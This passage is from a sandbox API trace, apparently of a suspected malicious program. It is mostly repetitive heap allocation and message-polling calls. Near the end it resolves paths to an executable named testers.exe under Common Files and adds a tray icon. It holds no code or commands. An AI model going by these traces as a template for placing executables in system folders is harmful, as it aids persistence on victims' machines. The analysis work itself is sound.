hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9ef0 | out: hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5da0 | out: hHeap=0xbc0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ef0 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9490 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5da0 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9490 | out: hHeap=0xbc0000) returned 1 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9f18 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9490 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9478 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5db0 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9478 | out: hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5db0 | out: hHeap=0xbc0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.620] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9f40 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9478 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5db0 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9478 | out: hHeap=0xbc0000) returned 1 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9f68 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9478 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5dc0 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5dc0 | out: hHeap=0xbc0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9f90 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5dc0 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9fb8 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94a8 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5dd0 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94a8 | out: hHeap=0xbc0000) returned 1 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5dd0 | out: hHeap=0xbc0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9fe0 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94a8 [0256.621] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5dd0 [0256.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94a8 | out: hHeap=0xbc0000) returned 1 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca008 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94a8 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94c0 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5de0 [0256.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94c0 | out: hHeap=0xbc0000) returned 1 [0256.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5de0 | out: hHeap=0xbc0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca030 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94c0 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5de0 [0256.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94c0 | out: hHeap=0xbc0000) returned 1 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdeeb8 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94c0 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94d8 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5df0 [0256.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94d8 | out: hHeap=0xbc0000) returned 1 [0256.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5df0 | out: hHeap=0xbc0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca058 [0256.622] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94d8 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5df0 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94d8 | out: hHeap=0xbc0000) returned 1 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdeef0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94d8 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94f0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e00 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94f0 | out: hHeap=0xbc0000) returned 1 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e00 | out: hHeap=0xbc0000) returned 1 [0256.623] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca080 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94f0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e00 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd94f0 | out: hHeap=0xbc0000) returned 1 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdef28 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd94f0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9508 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e10 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9508 | out: hHeap=0xbc0000) returned 1 [0256.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e10 | out: hHeap=0xbc0000) returned 1 [0256.623] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca0a8 [0256.623] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9508 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e10 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9508 | out: hHeap=0xbc0000) returned 1 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdef60 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9508 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9520 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e20 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9520 | out: hHeap=0xbc0000) returned 1 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e20 | out: hHeap=0xbc0000) returned 1 [0256.624] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca0d0 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9520 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e20 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9520 | out: hHeap=0xbc0000) returned 1 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xc63920 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9520 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9538 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e30 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9538 | out: hHeap=0xbc0000) returned 1 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e30 | out: hHeap=0xbc0000) returned 1 [0256.624] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca0f8 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9538 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e30 [0256.624] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9538 | out: hHeap=0xbc0000) returned 1 [0256.624] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdef98 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9538 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9550 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e40 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9550 | out: hHeap=0xbc0000) returned 1 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e40 | out: hHeap=0xbc0000) returned 1 [0256.625] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca120 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9550 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e40 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9550 | out: hHeap=0xbc0000) returned 1 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdefd0 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9550 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9568 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e50 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9568 | out: hHeap=0xbc0000) returned 1 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e50 | out: hHeap=0xbc0000) returned 1 [0256.625] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca148 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9568 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e50 [0256.625] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9568 | out: hHeap=0xbc0000) returned 1 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf008 [0256.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9568 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9580 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e60 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9580 | out: hHeap=0xbc0000) returned 1 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e60 | out: hHeap=0xbc0000) returned 1 [0256.626] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca170 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9580 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e60 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9580 | out: hHeap=0xbc0000) returned 1 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfae98 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9580 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9598 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e70 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9598 | out: hHeap=0xbc0000) returned 1 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e70 | out: hHeap=0xbc0000) returned 1 [0256.626] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca198 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9598 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e70 [0256.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9598 | out: hHeap=0xbc0000) returned 1 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfaee0 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9598 [0256.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95b0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e80 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95b0 | out: hHeap=0xbc0000) returned 1 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e80 | out: hHeap=0xbc0000) returned 1 [0256.627] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca1c0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95b0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e80 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95b0 | out: hHeap=0xbc0000) returned 1 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfaf28 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95b0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95c8 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5e90 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95c8 | out: hHeap=0xbc0000) returned 1 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5e90 | out: hHeap=0xbc0000) returned 1 [0256.627] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca1e8 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95c8 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5e90 [0256.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95c8 | out: hHeap=0xbc0000) returned 1 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfaf70 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95c8 [0256.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95e0 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5ea0 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95e0 | out: hHeap=0xbc0000) returned 1 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5ea0 | out: hHeap=0xbc0000) returned 1 [0256.628] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca210 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95e0 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5ea0 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95e0 | out: hHeap=0xbc0000) returned 1 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf040 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95e0 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95f8 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5eb0 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95f8 | out: hHeap=0xbc0000) returned 1 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5eb0 | out: hHeap=0xbc0000) returned 1 [0256.628] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca238 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95f8 [0256.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5eb0 [0256.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd95f8 | out: hHeap=0xbc0000) returned 1 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xc43728 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd95f8 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9610 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5ec0 [0256.629] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9610 | out: hHeap=0xbc0000) returned 1 [0256.629] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5ec0 | out: hHeap=0xbc0000) returned 1 [0256.629] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca260 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9610 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5ec0 [0256.629] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9610 | out: hHeap=0xbc0000) returned 1 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfafb8 [0256.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9610 [0256.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9628 [0256.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5ed0 [0256.630] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9628 | out: hHeap=0xbc0000) returned 1 [0256.630] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5ed0 | out: hHeap=0xbc0000) returned 1 [0256.630] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcca288 [0256.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9628 [0256.633] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0256.634] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0256.635] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0256.636] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0256.636] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0256.636] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x7cfa2c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0257.326] Shell_NotifyIconW (dwMessage=0x1, lpData=0x7df020) returned 1 [0257.326] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc062b0 | out: hHeap=0xbc0000) returned 1 [0257.326] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.326] KillTimer (hWnd=0x40172, uIDEvent=0x1) returned 1 [0257.327] SetTimer (hWnd=0x40172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0257.327] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.413] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, 